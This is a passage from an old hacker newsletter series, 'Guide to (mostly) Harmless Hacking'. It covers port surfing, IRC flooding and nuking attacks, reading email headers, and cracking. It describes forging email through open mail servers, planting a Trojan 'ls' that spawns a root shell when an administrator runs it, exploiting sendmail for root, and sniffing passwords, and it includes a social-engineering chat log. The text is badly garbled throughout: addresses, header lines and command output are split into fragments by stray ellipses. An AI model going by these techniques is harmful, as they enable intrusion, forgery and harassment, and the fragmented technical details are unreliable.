Notice that finger lists the connection to the computer I was port surfing from: kitsune
...
Please remember, when you port surf, unless you know how to do IP spoofing,
your target computer knows where you came from
...

Now let’s try the obvious
...
I use the numerical address just for the
heck of it:
->telnet 146
...
192
...
230
...
18
...
230
...
18
...

NetBSD/i386 (daisy
...
und
...
za) (ttyp0)
login:

Hey, this is interesting
...
And NetBSD is a freeware Unix that runs on a PC! Probably a 80386 box
...

It sounds like a friendly place
...
Let’s finger and see who’s logged in just now:
Since I am already in the telnet program (I can tell by the prompt “telnet>“), I go to daisy using the “open”
command:
telnet> open daisy
...
und
...
za 79
Trying 146
...
192
...

telnet: connect: Connection refused
telnet> quit
Well, that didn’t work, so I exit telnet and try the finger program on my shell account computer:
->finger @daisy
...
und
...
za
[daisy
...
und
...
za]
finger: daisy
...
und
...
za: Connection refused
Sigh
...
But it’s a good security practice to close finger
...
Why would I (and
others) want to shut it down? Not because of hackers and abuse or some STUPID S*** like that
...
You get machine load and all the user
information
...
altavista
...
It links me to the site
http://www
...
ac
...
html, which is titled “Traffic on the UNINET -SPRINTLINK Link
...

Next, let’s look into number 20 on that traceroute that led us to the University of Natal
...

->telnet 155
...
82
...
232
...
2
...
232
...
2
...

Id: und02
Authorised Users Only!
------------------------

User Access Verification
Username:
Yup, we’re out of friendly territory now
...
Just for laughs,
though, let’s go back to the default telnet port:

->telnet 155
...
82
...
232
...
2
...
232
...
2
...

Id: und02
Authorised Users Only!
------------------------

User Access Verification
Username:
Now just maybe this backbone-type computer will tell us gobs of stuff about all the computers it is
connected to
...
This, if it happens to be open to the public, will tell us
all about the computers that connect through it:
->telnet 155
...
82
...
232
...
2
...
I gave an example of the incredible wealth of information you can get from netstat on the GTMHH on
port surfing
...
That’s because the information netstat
gives is so useful to computer criminals
...
So you will find few boxes using it
...
”
How can you can read that information? Try this:
First, change to the /etc/ directory:
->cd /etc
Then command it to print it out to your screen with:
->more services
#
# @(#)services 1
...
and so on
...
It
also probably won’t list specialized services like all those Cisco router port assignments
...
nmia
...
59
...
10
...
nmia
...

Escape character is '^]'
...
You can get some information on the topology of the Sprintlink backbone at
http://www
...
net/SPLK/HB21
...
2
...
All I can pick up on their Web site today is pretty vague
...
The Internet is getting less friendly, but more secure
...
Hmph! Today it’s just firewalls
everywhere you look!” Adds Sorder, “Gee
...
port surfing over 6 years
ago
...
com) for assis tance in reviewing and contributing to this
GTMHH
...
3 Number 3
How to keep from getting kicked off IRC!
_____________________________________________ _______________
Our thanks to Patrick Rutledge, Warbeast, Meltdown and k1neTiK, who all provided invaluable information
on the burning question of the IRC world: help, they’re nuking meee
...
until you get on a server
where hacker wars reign
...
But let’s say you’d rather hang in there
...


On IRC a group of people type messages back and forth on a screen in almost real time
...
And unlike Usenet, if
you say something you regret, it’s soon gone from the screen
...
That is, it will soon be gone if no one
is logging the session
...
So don’t expect to see timeless wisdom and wit scrolling down your computer screen
...
Also, given the wars you can fight for control of IRC channels, it can give you a
good hacker workout
...

***********************
Newbie note: Any program that uses a resource is called a “client
...
” Your IRC client program runs on either your home computer or shell account computer and
connects you to an IRC server program which runs on a remote computer somewhere on the Internet
...
Customer service at your ISP should be able to
help you with instructions on how to use it
...

Where are good IRC servers for meeting other hackers?
There are several IRC servers that usually offer hacker channels
...
It was originally started by the Eris FreeNet (ef
...
It is reputed to be a “war ground” where you
might get a chance to really practice the IRC techniques we cover below
...
The main purpose of Undernet is to be a friendly
place with IRC wars under control
...
Heck, they can ban you for good
...

************************************
Newbie note: A domain is the last two (or sometimes three or four) parts of your email address
...
com is the domain name for America Online
...
com domain, that
would mean every single person on America Online would be banned from it
...
You’d better hope that word doesn’t get out to all the IRC addicts on your ISP that you were the
dude that got you guys all kicked out
...
IRCNet is basically the European/Australian
split off from the old EFNet
...
Get on the right IRC network and you can be making friends with
hackers on any continent of the planet
...
To learn how to
contact them, surf over to: http://www
...
org/
...
com or http://digital
...
com and searching for “IRC server
...
Note that is a “zero” not an “O” in l0pht
...

****************************************

But before you get too excited over trying out IRC, let us warn you
...
They get their laughs by kicking other people off IRC entirely
...
So they beat up on people in cyberspace where they
don’t have to fret over getting ouchies
...

However, first you’ll need to know some of the ways you can get kicked off IRC by these bullies
...

You see, the first person to start up a channel on an IRC server is automatically the operator (OP)
...
Also, if the operator wants to, he or she may
pass operator status on to someone else
...
Also, maybe
someone who you think is your good buddy is begging you to please, please give him a turn being the
operator
...
But if you
mess up and accidentally OP a bad guy who is pretending to be someone you know and trust, your fun chat
can become history
...

But this is easier said than done
...
You may not want to
appear stuck up by refusing to OP anyone
...

This “/whois” command will give back to you the email address belonging to the person using that nick
...
net” instead of the address you expected, say friend@cool
...
Make the person explain who he or she is and why the email address is different
...
Your real trouble comes when people deploy “nukes” and “ICBMs” against you
...
” This includes forged messages such as EOF (end of file),
dead socket, redirect, etc
...
This is an class of IRC attacks that go
beyond exploiting quirks in the IRC server program to take advantage of major league hacking techniques
based upon the way the Internet works
...
They are not just
harmless harassment of a single person on IRC, but may affect an entire Internet host computer, disputing
service to all who are using it
...
Send it to routerx
...
net instead!” So an ICMP redirect message could cause your IRC messages
to go to bit heaven instead of your chat channel
...
” “Dead socket” refers to connections such as your PPP session that you would
be using with many IRC clients to connect to the Internet
...
That’s what the program “ICMP
Host Unreachable Bomber for Windows” does
...
” The idea
is that a bully will find out what Internet host you are using, and then give the command “ping-f” to your
host computer
...
Yes, on IRC it is possible to identify the dynamically
assigned IP address of your home computer and send stuff directly to your modem! If the bully has a decent
computer, he or she may be able to ping yours badly enough to briefly knock you out of IRC
...

**********************
Newbie note: When you connect to the Internet with a point-to-point (PPP) connection, your ISP’s host
computer assigns you an Internet Protocol (IP) address which may be different every time you log on
...
” In some cases, however, the ISP has arranged to assign the
uses the same IP address each time
...

The purpose of flooding is to send so much garbage to a client that its connection to the IRC server either
becomes useless or gets cut off
...
For example, you could just hold down the “x” key and hit enter from
time to time
...
However, text flooding is almost always unsuccessful because almost any IRC client (the
program you run on your computer) has text flood control
...
Most IRC servers also have text flood filters
...

******************************************
Newbie note: “K:line” means to ban not just you, but anyone who is in your domain from an IRC server
...
edu,
then every person whose email address ends with “giantstate
...

*******************************************
Client to Client Protocol (CTCP) echo flooding is the most effective type of flood
...
It is a command used within IRC to check to
see if someone is still on your IRC channel
...
”
What has happened is that your victim’s IRC client program has automatically echoed whatever message
you sent
...
This is because most IRC servers will
automatically cut you off if you try text flooding
...

Of course your attacker could also get booted off for making all those CTCP echo requests
...
So by having different
versions of him or herself in the form of software bots making those CTCP echo requests, the attacker stays
on while the victim gets booted off
...

******************************
Newbie note: A “bot” is a computer program that acts kind of like a robot to go around and do things for
you
...
For example, some IRC bots wait for someone to use bad
language and respond to these naughty words in annoying ways
...
The
IRC Cops who control hacker wars on these networks love nothing more than killing bots and banning the
botrunners that they catch
...
You can give the command “/ping nick” and the IRC client of the guy
using that nick would respond to the IRC server with a message to be passed on to the guy who made the
ping request saying “nick” is alive, and telling you how long it took for nick’s IRC client program to
respond
...
So if someone seems to
be taking a long time to reply to you, it may just be a slow Internet
...
But just about every Unix IRC program has at least some CATCH
flood protection in it
...

So how do you handle IRC attacks? There are several programs that you can run with your Unix IRC
program
...
These scripts will run in the background of your
Unix IRC session and will automatically kick in some sort of protection (ignore, ban, kick) against attackers
...
In fact,
when I first got on an IRC channel recently using Netscape 3
...
Yeah, thanks
...

For Windows 95 you may wish to use the mIRC client program
...
super-highway
...
html
...
But
this program isn’t enough to handle all the IRC wars you may encounter
...
You can get it
from http://www
...
com/~marcraz/
...
You can download it from ftp
...
org , in
the directory /pub/irc/clients/unix, or http://www
...
org/, or ftp://cs -ftp
...
edu/irc/
...
cibola
...
Ahem, at this same site you can
also download the attack program Tick from /pub/irc/tick
...
irchelp
...
Or go to Usenet and check out alt
...
questions
*********************************
*********************************
Evil genius tip: Want to know every excruciating technical detail about IRC? Check out RFC 1459 (The IRC
protocol)
...

********************************
Now let’s suppose you are all set up with an industrial strength IRC client program and war scripts
...
Even
if the other guys start it, remember this
...
Until you become an IRC
master yourself, we suggest you do no more than ask politely for OPs back
...
For instance, if #evilhaxorchat is taken over,
just create #evilhaxorchat2 and "/invite IRCfriend" all your friends there
...

As Patrick Rutledge says, this might sound like a wimp move, but if you don't have a fighting chance, don't
try - it might be more embarrassing for you in the long run
...

That’s it for now
...

____________________________________________________________

___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol 3 Number 4
How to Read Email Headers and Find Internet Hosts
Warning: flamebait enclosed!
____________________________________________________________
OK, OK, you 31337 haxors win
...


Now some of you may think that headers are too simple or boring to waste time on
...
But not one person replied with a complete answer -- or
even 75% of the answer -- or even suspected that for months almost all Happy Hacker mailings have
doubled as protests
...
Conclusion: it is
time to talk headers!
In this Guide we will learn:
· what is a header
· why headers are fun
· how to see full headers
· what all that stuff in your headers means
· how to get the names of Internet host computers from your headers
· the foundation for understanding the forging of email and Usenet posts, catching the people who forge
headers, and the theory behind those email bomber programs that can bring an entire Internet Service
Provider (ISP) to its knees
This is a Guide you can make at least some use of without getting a shell account or installing some form of
Unix on your home computer
...

However, if you do have a shell account, you can do much more with deciphering headers
...
Heck, the Eudora email program named the button you click to read
full headers “blah blah blah
...
Yes, every email header you check out has the
potential to unearth a treasure hidden in some back alley of the Internet
...
But when I
went to look up the topic of headers in my library of manuals, I was shocked to find that most of them don’t
even cover the topic
...
Even the
relevant RFC 822 is pretty vague
...
To read them, take your Web browser to
http://altavista
...
com and search for “RFC 822” etc
...
Hey, that’s how real hackers are supposed
to figure out stuff when RTFM (read the fine manual) or RTFRFC (read the fine RFC)doesn’t tell us as much
as we want to know
...
People have pointed out to me that every time I put an email address or domain name in a
Guide to (mostly) Harmless Hacking, a zillion newbies launch botched hacking attacks against these
...

******************************* *****************
Newbie note: The verb “to fubar” means to obscure email addresses and Internet host addresses by
changing them
...

************************************************

WHAT ARE HEADERS?
If you are new to hacking, the headers you are used to seeing may be incomplete
...
foobar
...
com
But if you know the right command, suddenly, with this same email message, we are looking at tons and
tons of stuff:
Received: by o200
...
net (950413
...
8
...
12/951211
...
net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi
...
no by o200
...
net via ESMTP (950413
...
8
...
12/951211
...
com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir
...
foobar
...
ifi
...
no [129
...
64
...
foobar
...
6
...
4)
id ...
no> for ...
foobar
...
ifi
...
no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809
...
gyllir@ifi
...
no>
To: hacker@techbroker
...
But first we must consider the burning question of the day:
WHY ARE HEADERS FUN?
Why bother with those “blah blah blah” headers? They are boring, right? Wrong!
1) Ever hear a wannabe hacker complaining he or she doesn’t have the addresses of any good computers to
explore? Have you ever used one of those IP scanner programs that find valid Internet Protocol addresses
of Internet hosts for you? Well, you can find gazillions of valid addresses without the crutch of one of these
programs simply by reading the headers of emails
...

3) Want to learn how to convincingly forge email? Do you aspire to write automatic spam or email bomber
programs? (I disapprove of spammer and email bomb programs, but let’s be honest about the kinds of
knowledge their creators must draw upon
...

4) Want to attack someone’s computer? Find out where best to attack from the headers of their email
...
But I’m dedicated to telling you the truth about h acking, so like it or not, here it
is
...
Want to
see all the hidden stuff? The way you do this depends on what email program you are using
...
To see full headers in Eudora, just click the “blah, blah,
blah” button on the far left end of the tool bar
...
To see full headers, click on Options, then click the
“Show All Headers” item
...
Oh, no, I can see the flames coming, how
dare I not learn the ins and outs of IE mail! But, seriously, IE is a dangerously insecure Web browser
because it is actually a Windows shell
...
Just say “no” to IE
...
Maybe there is an easy way to see full headers in Pegasus, but I
haven’t found it
...
It is included in the Windows 95 operating system and is the best
Windows editing program I have found for handling documents with lots of embedded control characters
and other oddities
...
01 email program automatically shows full headers
...
Since in order to be a real hacker you
will sooner or later be using Unix, now may be a great time to start using Pine
...
Both Pine and Elm date back to ARPAnet, the US Defense Advanced Research Projects Agency
computer network that eventually mutated into today’s Internet
...
According to the
official blurb, “PINE is the University of Washington's ‘Program for Internet News and
Email’
...
But aside from its amazing powers, there is a really good reason to learn to compose email in Pine:
you get practice using pico editor commands
...

To bring up Pine, at the cursor in your Unix shell simply type in “pine
...
If
this doesn’t work, you will have to go into the Setup menu to enable this command
...
Then in the Setup menu choose “c” for Config
...
91 SETUP CONFIGURATION Folder: INBOX 2 Messages
[ ] compose-rejects-unqualified-addrs
[ ] compose-sets -newsgroup-without-confirm
[ ] delete-skips-deleted
[ ] enable -aggregate-command-set
[ ] enable -alternate-editor-cmd
[ ] enable -alternate-editor-implicitly
[ ] enable -bounce-cmd
[ ] enable -flag-cmd
[X] enable-full-header-cmd

[]
[]
[]
[]
[]
[]
[]
[]
[]
[]
? Help

enable -incoming-folders
enable -jump-shortcut
enable -mail-check-cue
enable -suspend
enable -tab-completion
enable -unix-pipe-cmd
expanded-view-of-addressbooks
exp anded-view-of-folders
expunge-without-confirm
include-attachments-in-reply

E Exit Config P Prev
- PrevPage
X [Set/Unset] N Next Spc NextPage W WhereIs

You first highlight the line that says “enable -full-header-command” and then press the “x” key
...
Once you have done this, when you are reading your email you will be able to see
full headers by giving the “h” command
...
It actually gives slightly more detailed headers than Pine, and
automatically shows full headers
...
Then we’ll examine two headers that reveal
some interesting shenanigans
...

OK, let us return to that fairly ordinary full header we looked at above
...

First we look at the simple version:
From: Vegbar Fubar ...
no>
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker
...
Each field consists of two parts: a field name, which includes no spaces and is terminated by a
colon; and the contents of the field
...

In every header there are two classes of fields: the “envelope,” which contains only the sender and recipient
fields; and everything else, which is information specific to the handling of the message
...

When we expand to a full header, we are able to see all the fields of the header
...

Received: by o200
...
net (950413
...
8
...
12/951211
...
net id OAA07210; Fri, 11
Apr 1997 14:10:06 -0400
This line tells us that I downloaded this email from the POP server at a computer named o200
...
net
...
net
...
SGI
...
6
...
SGI) part identifies the software name and version running that POP server
...
Your POP server is the computer that holds your email
until you want to read it
...

A similar, but more general protocol is IMAP, for Interactive Mail Access Protocol
...
)
********************************************
Now we examine the second line of the header:
Received: from ifi
...
no by o200
...
net via ESMTP (950413
...
8
...
12/951211
...
com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Well, gee, I didn’t promise that this header would be *totally* ordinary
...
foobar
...
fooway
...
com
...
com into the
account techbr@fooway
...
Under Unix this is done by setting up a file in your home directory named
“
...
Now there is a lot more behind this, but I’m
not telling you
...
Can any of you evil geniuses out there figure out the whole story?
“ESMTP” stands for “extended simple mail transfer protocol
...
SGI
...
6
...
SGI”
designates the program that is handling my email
...
ifi
...
no (2234@gyllir
...
foobar
...
xxx
...
230]) by ifi
...
no with ESMTP
(8
...
11/ifi2
...
foobar
...
com> ; Fri, 11 Apr 1997 20:09:56 +0200
This line tells us that the computer ifi
...
no got this email message from the computer gyllir
...
foobar
...

These two computers appear to be on the same LAN
...
The computer
name gyllir
...
foobar
...
xxx
...
230
...

(I substituted “
...
” for three numbers in order to fubar the IP address
...
foobar
...
How come?
Now if you are working with Windows 95 or a Mac you probably can’t figure out this little mystery
...
foobar
...
com
Address: 198
...
71
...
foobar
...
xxx
...
2
Notice the different numerical IP addresses between ifi
...
no and gyllir
...
foobar
...
Hmmm, I begin to
think that the domain ifi
...
no may be a pretty big deal
...
Probing with nslookup in the mode “set type=any” tells me
yet more
...
no” mean, anyhow? A quick look at the International Standards Organization (ISO)
records of country abbreviations, I see “no” stands for Norway
...
A quick search of the mailing list for
Happy Hacker reveals that some 5% of its almost 4,000 email addresses have the
...
So now we
know that this land of the midnight sun is also a hotbed of hackers! Who said headers are boring?
On to the next line, which has the name and email address of the sender:
From: Vegbar Fubar ...
no>
Received: from localhost (Vegbarha@localhost) by gyllir
...
foobar
...
This line says the computer gyllir
...
foobar
...
” Now “localhost” is what a Unix computer calls itself
...
” You’ll get a login sequence that gets you right back into
your own account
...
ifi
...
no got the email message from “localhost” I assume that means the
sender of this email was logged into a shell account on gyllir
...
foobar
...

I quickly test this hypothesis:
> telnet gyllir
...
foobar
...
xxx
...
230
...
ifi
...
no
...


IRIX System V
...
ifi
...
no)
Now Irix is a Unix-type operating system for Silicon Graphics Inc
...
This fits with the name of
the POP server software on ifi
...
no in the header of (950413
...
8
...
12/951211
...
So, wow, we are
looking at a large network of Norwegian computers that includes SGI boxes
...

Now you don’t see SGI boxes just every day on the Internet
...

So I’m really tempted to learn more about this domain
...
So I try out http://ifi
...
no
...
ifi
...
no
...
The
Informatikk division has strengths in computer science and image processing
...
foobar
...

Next I check out www
...
no and learn the University of Oslo has some 39,000 students
...
foobar
...
The next line is pretty simple, just the date:
Date: Fri, 11 Apr 1997 18:09:53 GMT
But now comes the most fascinating line of all in the header, the message ID:
Message-Id: <199704111809
...
gyllir@ifi
...
no>

The message ID is the key to tracking down forged email
...
Computer criminals go to a great deal of effort to find Internet hosts
on which to forge email that will leave no trace of their activities through these message IDs
...
199704111809 means 1997, April 11, 18:08 (or 6:08 PM)
...
Others may leave out the “19” from the year
...
foobar
...
foobar
...

Where on this computer are the records of the identities of senders of email stored? Now Unix has many
variants, so I’m not going to promise these records will be in a file of the same name in every Unix box
...
Some sysadmins will archive the message
IDs in case they need to find out who may have been abusing their email system
...
Unfortunately, an Internet host that
doesn’t archive these message IDs is cre ating a potential haven for email criminals
...

Received: from NIH2WAAF (mail6
...
csi
...
xxx
...
75]) by Fubarino
...
8
...
6
...
com>; Sun, 27 Apr 1997 23:07:01 GMT
Received: from CISPPP - 199
...
193
...
com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 0400
Message-Id: <2
...
16
...
2cdf544e@fubar
...
com
X-Mailer: Windows Eudora Pro Version 2
...
0
Content-Type: text/plain; charset="us-ascii"
To: galfina@Fubarino
...
Meinel" ...
foo1
...
com [149
...
183
...
com (8
...
3/8
...
9) with ESMTP
id XAA20854 for ...
com”
...
com>“ part
...
foo1
...
com [149
...
183
...
This computer name is given first in a form easily (ha, hah!) read by
humans followed by the version of its name that a computer can more easily translate into the 0’s and 1’s
that computers understand
...
I chose it in order to irritate G
...
L
...
(Gray Areas Liberation Front)
...
com (8
...
3/8
...
9)” is the name of the computer that received the email for my galfina account
...
All we get is a domain name and not the name of the computer from
which I download my email
...
com is not the full name because Fubarino is a big
enough ISP to have several computers on a LAN to serve all its users
...


For example, I explored the Fubarino
...
Fubarino
...
com”); and then dialin
...
com and milnet
...
com (from “who” given while logged in
my galfina account)
Then using the numerical addresses given from the dig command with these names of Fubarino
...
com computers
...
com is not a numerical IP address
...
We can guess from these numbers 8
...
3/8
...
9 that it refers to the Sendmail program
...
com 25
...
com ESMTP Sendmail 8
...
3/8
...
9 ready at Mon, 28 Apr 1997 09:55:58 GMT
So from this we know Fubarino
...

**************************************************
Evil genius tip: Sendmail is notorious for flaws that you can use to gain root access to a computer
...
com is using a version of sendmail that has been fixed from its most recently publicized
security holes, if you are patient a new exploit will almost certainly come out within the next few months
...

**************************************************
OK, now let’s look at the next “received” line in that header:
Received: from CISPPP - 199
...
193
...
com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 0400
CISPPP stands for Compuserve Information Services point to point protocol (PPP) connection
...
We also see that Compuserve
uses the Microsoft SMTPSVC mail program
...
2
...
19970428082132
...
com>
The number 2
...
16
...
2, 16-bit version
...

The portion of the message ID “2cdf544e@fubaretta
...
That is provided by
the Internet host where a record of my use of fubaretta’s mail server has been stored
...
com? This is,
first of all, because the message ID is created with the POP server that I specified with Eudora
...
So, heck, I can specify an arbitrary POP server when I send
email over Compuserve from Eudora
...
So there!
If I were to have done something bad news with that email such as spamming, extortion or email bombing,
the sysadmin at fubaretta
...
That assumes, of course, that fubaretta
...


So when you read this part of the header you might think that the computer where I pick up my email is with
the Fubaretta
...
But all this really means is that I specified to Eudora that I was using a mail account
at Fubar
...

Did I need to have an account at Fubaretta? No
...
In fact, I don’t
have an account at Fubaretta
...
com
X-Mailer: Windows Eudora Pro Version 2
...
0
Content-Type: text/plain; charset="us-ascii"
The “X-Mailer” information tells you I was using the 16 bit versi n of Windows Eudora Pro Version 2
...

o
Some people have asked me why I don’t use the 32 bit version (which runs on Win 95) instead of the 16 bit
version
...
Also, Eudora
lets me get away with stuph:)
Mime (Multipurpose Internet Mail Extensions)is a protocol to view email
...
If your email program doesn’t use Mime,
you get lots of stuff like “=92” instead of what I tried to send
...
So this time I hope I sent all you guys plain, friendly ASCII
...
Some email uses ISO ascii instead,
generally if it originates outside the US
...
In fact, this is a genuine muhahaha header
...
It’s from the Happy
Hacker Digest, April 12, 1997, from a copy that reached a test email address I had on the list:
Received: by o200
...
net (950413
...
8
...
12/951211
...
net id MAA07059; Mon,
14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400
Received: from mocha
...
com by o200
...
net via ESMTP (950413
...
8
...
12/951211
...
com> id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400
Received: from cmeinel (hd14-211
...
compuserve
...
xxx
...
211]) by mocha
...
com
(Netscape Mail Server v2
...
2
...
19970414100122
...
fooway
...
fooway
...
2 (16)
Mime-Version: 1
...
Meinel" ...
fooway
...
SGI
...
6
...
SGI)for techbr@fooway
...
fooway
...
But, heck, let’s probe a little more deeply
...

> telnet o200
...
net 110
Trying 207
...
192
...

Connected to o200
...
net
...

+OK QUALCOMM Pop server derived from UCB (version 2
...
4-R3) at mail starting
...
If you have ever run one of those hacker
“strobe” type programs that tell you what programs are running on each port of a computer, there is really
no big deal to it
...
But in my humble opinion
you will learn much more by strobing ports by hand the same way I am doing here
...
So we check out the second field in this header:
Date: Mon, 14 Apr 1997 12:05:22 -0400
That -0400 is a time correction
...
icefubarnet
...
fooway
...
SGI
...
6
...
SGI) for
...
icefubarnet
...
So where is mocha
...
com located? A quick use of the
whois command tells us:
> whois icefubarnet
...
fooway
...
So this explains the time
correction notation of -0400
...
foo
...
com [206
...
205
...
icefubarnet
...
01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700
This tells us that the Happy Hacker Digest was delivered to the mail server (SMTP stands for simple mail
transport protocol) at mocha
...
com by Compuserve
...
This merely represents a PPP session I set up with
Compuserve
...
But you can’t learn much more easily because Compuserve
has great security -- one reason I use it
...

Now we get to the biggie, the message ID:

Message-Id: <2
...
16
...
4387d20a@mail
...
net>
Whoa, how come that ID is at the computer mail
...
net? It’s pretty simple
...
fooway
...
But if you were to do a little stobing, you would discover that while
fooway
...
You can get mail from Fooway,
but you can’t mail stuff out from Fooway
...
2 program sent my message ID off to mail
...
net anyhow
...
2
...
That signifies it is the 2
...

The remaining fields of the header were all inserted by Eudora:
X-Sender: techbr@mail
...
net (Unverified)
X-Mailer: Windows Eudora Pro Version 2
...
0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P
...
com>
Subject: Happy Hacker Digest April 12, 1997
Notice Eudora does let us know that techbr@mail
...
net is unverified as sender
...
This is a very important fact
...

So how was I able to use Icefubarnet Internet’s mail server to send out the Happy Hacker Digest?
Fortunately Eudora’s naivete makes it easy for me to use any mail server that has an open SMTP or ESMTP
port
...

Why did I use Icefubarnet? Because at the time it was hosting an ftp site that was being used to download
email bomber programs (http://www
...
com/~astorm/uy4beta1
...
Last time I checked the owner
of the account from wh ich he was offering this ugly stuff was unhappy because Icefubarnet Internet had
made him take it down
...
In Eudora, just
specify your victim mail server under the hosts section of the options menu (under tools)
...
”
But if you try any of this monkey business with Pegasus, it gives a nasty error message accusing you of
trying to forge email
...
But that will be covered in the upcoming GTMHH on shell programming
...
If you want to be a real hacker, you *must* learn Unix! If you
are serious about continuing to study these GTMHHs, you *must* either get a shell account or install some
form of Unix on your home computer
...
celestin
...
Or email haxorshell@techbroker
...

*********************************************
Hang, on, Vol
...
Yes, how to catch that 31137 d00d who emailbombed you or spammed you!
Happy Hacking, and be good!
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol
...
5
The Dread GTMHH on Cracking
____________________________________________________________
Nowadays if you ask just about anyone what a hacker is, he or she will tell you “a person who breaks into
computers
...
But there also is some truth to the public view
...
In fact, lots of hackers make fun of the kinds of stuff I think is fun: forging email
and Usenet posts and programming Easter eggs into commercial software and creating Win 95 bootup
screens that say “Bill Gates’ mother wears army boots
...
The dread GTMHH on Cracking
...

“But, but,” you say
...
Sez right here in the welcome message you sent me
when I signed up
...
Hackers fib sometimes
...
The only
exceptions are breaking into your own computer, or breaking into a computer whose owner has given you
permission to try to break in
...
It
doesn’t matter if you make some stranger’s computer better
...

************************************************
Honestly, this Guide really *is* about harmless hacking
...
From time to time hardy souls offer up their computers for their friends, or sometimes even the
entire world, as targets for cracking
...

In fact, here’s a really fun computer that you have permission to break into
...
sekurity
...


But how do you know whether this or any other announcement of a cracker welcome mat is legitimate? How
do you know I’m not just playing a mean old trick on Damien by sending out an invitation to break into his
box to the 5,000 crazed readers of the Happy Hacker list?
Here’s a good way to check the validity of offers to let anyone try to break into a computer
...
sekurity
...
Then add “root@” to the domain name, for
example root@obscure
...
org
...
Ask him if I was fibbing about his
offer
...
Just kidding:)
Actually, in this case you may email info@sekurity
...
Also, please be good guys and attack off hours (Mountain Daylight Savings Time, US)
so he can use obscure
...
org for other stuff during the day
...
org and
mention that you are doing it, and what domain you are coming from
...
”
We all owe you thanks, Damien, for providing a legal target for the readers of this GTMHH to test their
cracking skills
...
What? Some guys
say it’s too hard to break into a fortified box like obscure
...
org? They say it’s more fun to break into a
computer when they’re breaking the law? They say to be a Real Hacker you must run around trashing the
boxes of the cringing masses of Internet hosts? Haw, haw, sendmail 4
...
They sure
taught those sendmail 4
...
Yeah, we all are
sure impressed
...
This can -- should!-- include your own computer
...

There are an amazing number of ways to break into computers
...
This generally involves lying
...

*********************************************
From: Oracle Service Humour List ...

Certainly one of the best Absurd IMs we've EVER received! Newfpyr's comments are in brackets
throughout
...
We need
you, the AOL user, to hit reply and type in your password
...


Newfpyr: Hello! This is Server Manager #563
...
I
mean, this has been happening too much lately
...
Have
you got the mail sent out to all server managers?
Zabu451: no
NewfPyr: Really? Ouch
...
Oh, well
...

Zabu451: no i still need passwords
NewfPyr: I see
...

NewfPyr: He says I need your server manager password
...
Let me find out what server you're using
...
It said he was from Springfield, Mass
...

Zabu451: how did u know?!!!?!?!!?!?!?!?!??!!
NewfPyr: I used Server Tracker 5
...
Don't you have it?
Zabu451: do you know my address!?!?!?!!?!?
NewfPyr: Of course not
...
Okay, now that we have your number, we have your address, and we are sending a repair
team over there
...

Zabu451: STOP THEM NOW
NewfPyr: I can't break AOL Policy
...
You know, where you're calling AOL from
...
The repair team isn't coming anymore
...

Zabu451: NONONONO
Zabu451: im sorry
Zabu451: ill never do it again please make them not come
Zabu451: PLEASE IL STOP ASKING FOR PASSWORDS FOREVER PLEASE MAKE THEM STOP!!
NewfPyr: I’m sorry, I can't do that
...

Zabu451: IM SORRY IL DO ANYTHING PLEASE I DONT WANT THEM TO HURT ME
Zabu451: PLEASE
Zabu451: PLEEEEEEEEEEEEEEAAAAAAAAASSSSSSSSE
NewfPyr: They won't hurt you! You'll probably only spend a year of prison
...
You won’t go to prison for a year
...

Zabu451: No! IM SORRY
Zabu451: PLEASE MAKE THEM STOP
Zabu451: PLEASE
[I thought this was enough
...
]

NewfPyr: Since this was a first time offense, I think I can drop charges
...
If you ever do it again, we'll bump you off
...
]
One of the RARE RARE occasions that we've actually felt sorry for the hacker
...
M
...
@ aol
...
netforward
...
OK, then maybe you are
ready to try the Trojan Horse
...

For example, on a Unix shell account you might put a Trojan in your home directory named “ls
...
If the tech support guy is
sufficiently clueless, he may go into you account while he has root permission
...
According to Damien Sorder, “This will only work depending
on his 'PATH' statement for his shell
...
' before '/bin', then it will work
...
”
Presuming the sysadmin has been this careless, and if your Trojan is well written, it will call the real ls
program to display your file info -- while also spawning a root shell for your very own use!
***************************************************
Newbie note: if you can get into a root shell you can do anything -- ANYTHING -- to your victim computer
...
A good systems
administrator will give him or herself root privileges only when absolutely necessary to perform a task
...
Before you invite your friends to hack your box,
be prepared for anything, and I mean ANYTHING, to get messed up even by the most well-meaning of
friends
...
What this means is
any time you want to log into a computer from another computer by using telnet, your password is at the
mercy of any sniffer program that may be installed on any computer through which your password travels
...
So this attack is
clearly not for the beginner
...
computer” (it’s “tracert” in Windows 95) where you
substitute the name of the computer you were planning to log in on for the “my
...
”

Sometimes you may discover that when you telnet from one computer to another even within the city you
live in, you may go through a dozen or more computers! For example, when I trace a route from an
Albuquerque AOL session to my favorite Linux box in Albuquerque, I get:
C:\WINDOWS>tracert fubar
...
com [208
...
xx
...
25]
5 469 ms
6 426 ms
7 399 ms
8 400 ms
9 495 ms
]
10 522 ms
11 468 ms
12 551 ms

328 ms
329 ms
323 ms
329 ms

329 ms
329 ms
328 ms
493 ms

ipt-q1
...
aol
...
163
...
95]
tot-ta-r5
...
aol
...
163
...
126]
f4-1
...
Reston
...
ans
...
25
...
69]
h10-1
...
Washington-DC
...
ans
...
223
...
222
...
70
core3
...
mci
...
70
...
1]
core2-hssi-2
...
mci
...
70
...
169]
border7-fddi-0
...
mci
...
70
...
51]
american-comm-svc
...
mci
...
70
...
86

989 ms 490 ms webdownlink
...
net [208
...
37
...
128
...
33
491 ms 492 ms fubar
...
128
...
61]

If someone were to put a sniffer on any computer on that route, they could get my password! Now do you
want to go telneting around from one of your accounts to another?
A solution to this problem is to use Secure Shell
...
upc
...
According to the promotional literature, “Ssh (Secure Shell) is a program to
log into another computer over a network, to execute commands in a remote machine, and to move files from
one machine to another
...
”
If you want to get a password on a computer that you know is being accessed remotely by people using
Windows 3
...
You can find the details, which are so easy they will
